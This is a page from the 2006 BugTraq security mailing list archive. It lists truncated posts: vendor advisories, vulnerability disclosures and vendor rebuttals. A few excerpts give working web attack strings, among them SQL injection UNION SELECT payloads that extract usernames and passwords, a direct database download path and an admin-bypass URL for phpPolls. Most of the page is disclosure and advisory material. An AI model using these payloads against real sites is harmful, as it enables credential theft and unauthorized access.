BugTraq (Page 1103 of 1748)
Re: Mico crashes when contected with wrong IOR / DoS 2006-07-10
Karel Gardas (kgardas objectsecurity com)

Hello,

I would just like to add some corrections to the disclosure below.

On Thu, 6 Jul 2006, tuergeist wrote:

> == == == TOC == == ==
>
> 1. Affected Vendor
> 2. Affected Product
> 3. Vulnerability
> 4. Safety Hazard
> 5. Disclosure Timeline
> 6. Vendor Response
> 7. Patch / Workaround
> 8. Vulner

Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit 2006-07-09
Alexander Hristov (joffer gmail com)
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit
Link : http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
Date : 2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
--

Re: Re: vBulletin 3.5.4 (install_path) Exploit 2006-07-08
mikathebest2003 yahoo de
Quote:

The default vBulletin requires authentication prior to the usage of the upgrade system and the backup feature.

Well, but tell me when I will find a way to crack this requires authentication, then it will be possible to download every database.

And this requires authentication don't look

MS Word Unchecked Boundary Condition Vulnerability 2006-07-10
naveed (naveedafzal gmail com)
/*------------------------------------------------------------
* Microsoft Word unchecked boundary condition vulnerability.
* ---------------------------------------------------------
* One of the functions in mso.dll (older versions mso9.dll)
* cannot properly handle the specially cra

Digital Armaments Security Advisory 10.07.2006: Flexwath Authorization Bypassing and XSS Vulnerability 2006-07-10
info digitalarmaments com
Digital Armaments advisory is 04.15.2006

http://www.digitalarmaments.com/2006300687985463.html

I. Background

FlexWATCH is a stand-alone network camera server with built-in CMOS camera and web server which delivers crisp real time live videos at a rate up to 30fps over the network. It is normal

CC announces new Rootkit help forum insync with Book 2006-07-06
Paul Laudanski (zx castlecops com)
<http://www.castlecops.com/a6621-CastleCops_Announces_New_Rootkit_Help_Forum.html>

--
Paul Laudanski, Microsoft MVP Windows-Security
Submit Phish: www.castlecops.com/pirt
Phish XML Feed: www.castlecops.com/article6619.html
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki

RE: MIMESweeper For Web 5.X Cross Site Scripting 2006-07-10
Erez Metula (erezmetula 2bsecure co il)


MIMESweeper For Web 5.X Cross Site Scripting

I. INTRODUCTION

MIMESweeper For Web is a policy-based content security for web applications. It analyzes web content and blocks pages or files that are prohibited by the organizational security policy.

For more Information please refer to:
http://ww

Re: Invision Power Board v1.3 Final SQL Injection 2006-07-10
mattmecham gmail com
At no point does the CODE parameter touch the database. The CODE parameter is used in a SWITCH statement to determine which function to run - it just directs traffic.

Secondly, IPB 1.3 is no longer officially supported by us (IPS) and is no longer available for purchase or download.

[USN-312-1] gimp vulnerability 2006-07-10
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-312-1 July 10, 2006
gimp vulnerability
CVE-2006-3404
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubun

phpPolls 1.0.3 Administration ByPass 2006-07-10
alp_eren ayyildiz org
SOFTWARE:

=========

phpPolls 1.0.3

DESCRIPTION:

============

dork: phpPolls view.php3

add to last path

phpPollAdmin.php3?poll_action=create

create a new poll

#################################################

Credits:AlpEren and tugr@

Site:

http://www.ayyildiz.org

http://

Re: galleria <= 1.0 Remote File Inclusion Vulnerability 2006-07-10
counterpoint mamboguru com
This is an example of a more general problem. Please see http://forum.mamboguru.com/showthread.php?p=1630 for details and ways to solve them.

[ GLSA 200607-05 ] SHOUTcast server: Multiple vulnerabilities 2006-07-09
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200607-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

RE: WebEx Downloader Plug-in Multiple Vulnerabilities + rant 2006-07-09
Web Ex (exwebex yahoo ca)
*498 days to fix an arbitrary code vulnerability
*Silently fixing buffer overrun vulns without releasing an advisory (http://xforce.iss.net/xforce/alerts/id/226, in "Additional Information" section)

Hmph. Wow.

I wonder if they kill-bitted older versions >>>hehehe ;-)

I ran across at least som

[SECURITY] [DSA 1106-1] New ppp packages fix privilege escalation 2006-07-10
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1106-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
July 10th, 2006

[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities 2006-07-10
matdhule gmail com
ECHO_ADV_37$2006

-------------

ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton) 2006-07-10
mozilla ids-guide de
ERNW Security Advisory 02-2006

Buffer Overflow in SIP Foundry's SipXtapi

Author:
Michael Thumann <mthumann[at]ernw.de>
Homepage: www.ernw.de

1. Summary:
The sipXtapi library from sip foundry contains a buffer overflow when parsing the CSeq field.
This flaw can be used by an attacker to gain cont

Re: [KAPDA::#46] - AjaxPortal Authentication Bypass 2006-07-09
earthquake freemail hu
Search it:

%') LIMIT 0 UNION SELECT 1337,username,password,1 FROM dbPfixajaxp_users/*

And it has a lot of bugs.

LAMP vs Microsoft 2006-07-09
Darren Reed (avalon caligula anu edu au)

Does anyone have statistics on the cumulative vulnerabilities
in LAMP vs the equivalent for Microsoft ? (I'm also interested
in whether there are better, as in more secure, environments than
LAMP.)

If the number of vulnerabilities is graphed over time, is either
heading down or both heading up or

MT Örümcek Toplist v2.2 Version Microsoft Access Driver ( MDB ) Download 2006-07-09
StorMBoY BsdMaiL Org
Title : MT Örümcek Toplist v2.2 Version Microsoft Access Driver ( MDB ) Download

-

Site : http://www.Cyber-Warrior.org

-

Author : StorMBoY

-

Mail : StorMBoY (at) BsdMail (dot) Org

-

Exploit : http://www.target.com/path/db/orumcektoplist.mdb

-

Code :

<%

Set baglanti

Re: RE: Invision Vulnerabilities, including remote code execution 2006-07-10
mattmecham gmail com
We have cleaned up much of the post parser in a recent security update which included removing the block of code that attempts to decode hex entities into HTML.

Part of the problem is trying to balance a feature rich application against various browser bugs (of which IE is the worst culprit for r

Re: Mico crashes when contected with wrong IOR / DoS 2006-07-09
tuergeist (tuergeist googlemail com)
UPDATE

Vendor's response, today:

Bugfix is available @ http://mico.org/down.html

"A potential denial of service problem has been found in MICO.
Malformed _non_existent call might crash MICO-based application server
side."

Graffiti Forums v1.0 SQL Injection Vulnerabilities 2006-07-08
paisterist nst gmail com
/*

--------------------------------------------------------

[N]eo [S]ecurity [T]eam [NST] - Advisory #24 - 08/07/06

--------------------------------------------------------

Program: Graffiti Forums

Homepage: http://www.bluedojo.com/

Vulnerable Versions: 1.0.

Risk: High!

Impact: Critical Risk

Re: Invision Power Board "v1.X & 2.X" SQL Injection 2006-07-10
mattmecham gmail com
Note, none of these 'exploits' have any chance of working.

The CODE attribute is never present in an SQL query - it's only used in a switch statement to direct incoming 'traffic' to the correct function within a class.

Furthermore 'act' parameters: 'ketqua' and file 'coin_list.php' are not st

[ GLSA 200607-04 ] PostgreSQL: SQL injection 2006-07-09
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200607-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Webvizyon Portal 2006 Version SQL Injection 2006-07-08
StorMBoY BsdMail Org
Title : Webvizyon Portal 2006 Version SQL Injection

-

Site : http://www.Cyber-Warrior.org

-

Author : StorMBoY

-

Mail : StorMBoY (at) BsdMail (dot) Org

-

Exploit : http://www.target.com/path/SayfalaAltList.asp?ID=-1 UNION ALL SELECT 0,kullaniciadi,sifre FROM uyeler

-

# S

[ GLSA 200607-03 ] libTIFF: Multiple buffer overflows 2006-07-09
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200607-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Copyright 2010, SecurityFocus